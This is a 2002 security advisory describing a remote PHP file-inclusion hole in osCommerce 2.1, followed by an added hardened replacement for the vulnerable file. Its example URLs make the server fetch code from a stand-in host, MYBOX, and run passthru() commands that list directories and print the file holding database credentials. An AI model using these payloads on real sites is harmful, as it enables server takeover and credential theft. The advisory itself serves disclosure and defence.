[UNIX] PHP Source Injection in osCommerce

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 18:42:33 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  PHP Source Injection in osCommerce
------------------------------------------------------------------------

SUMMARY

 <http://www.oscommerce.com> osCommerce is an open source e-commerce
solution under ongoing development by the open source community. Its
feature-packed out-of-the-box installation allows store owners to set up,
run, and maintain their online stores with minimum effort and with no
costs involved. A security vulnerability in the product allows attackers
to make the program include third-party PHP code into its existing code
base, thus causing the arbitrary execution of malicious code.

DETAILS

Vulnerable systems:
 * osCommerce Preview Release 2.1

osCommerce comes with a file called /catalog/includes/include_once.php
that looks like this:

-------- include_once.php --------
<?
  // $include_file is never assigned in this file. It is meant to be set by
  // the page that includes this script, but when include_once.php is
  // requested directly, register_globals (on by default in PHP 4) fills
  // it straight from the query string, so the requester chooses the file.
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
  }
?>
----------------------------------

If someone requests a URL like
http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE
he would be able to include any code he wants.

This could be a serious problem because this user could query the SQL
server and get access to other important files...

Examples:
1) Directory listing
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------

Would result in a directory listing of the current directory.

2) File viewing
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------

Would display the contents of the application_top.php file (the file
includes the MySQL username, password, etc.).
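A hardened replacement for include_once.php, written here as an added example for this advisory and not taken from osCommerce itself. It assumes that calling pages set $include_file to a bare file name such as 'application_top.php' and that every includable file lives in the script's own directory; the trigger_error() messages are placeholders, not the project's.

```php
<?php
// Hardened include_once.php (added example, not osCommerce's own code).
// Assumptions: calling pages set $include_file to a bare file name such as
// 'application_top.php' before including this script, and every includable
// file lives in this script's own directory.

// 1. Refuse to run as the top-level script. This file is meant to be
//    included by other pages, so a direct request for it is never legitimate.
if (realpath($_SERVER['SCRIPT_FILENAME']) === realpath(__FILE__)) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// 2. Validate the name wherever it came from (a caller, or register_globals).
//    A bare .php file name cannot carry "http://", "../" or an absolute path.
if (!isset($include_file) || !preg_match('/^[A-Za-z0-9_-]+\.php$/', $include_file)) {
    trigger_error('include_once.php: invalid include_file', E_USER_ERROR);
}

// 3. Resolve the path and confirm it is still inside this directory, so a
//    symlink placed among the includes cannot redirect the include either.
$base = realpath(dirname(__FILE__));
$path = realpath($base . DIRECTORY_SEPARATOR . $include_file);
if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
    trigger_error('include_once.php: ' . $include_file . ' not found', E_USER_ERROR);
}

// 4. Include the validated local file once. PHP's include_once replaces the
//    define() guard of the original; allow_url_fopen=Off is an additional
//    server-side defence against remote includes but is not relied on here.
include_once $path;
```

Setting register_globals = Off in php.ini stops the request from populating $include_file at all, and is the setting worth checking on any host running this release.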

Vendor response:
The vendor has been informed and is currently working on a fix.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:Tim.Vandermeersch@pandora.be> Tim Vandermeersch.
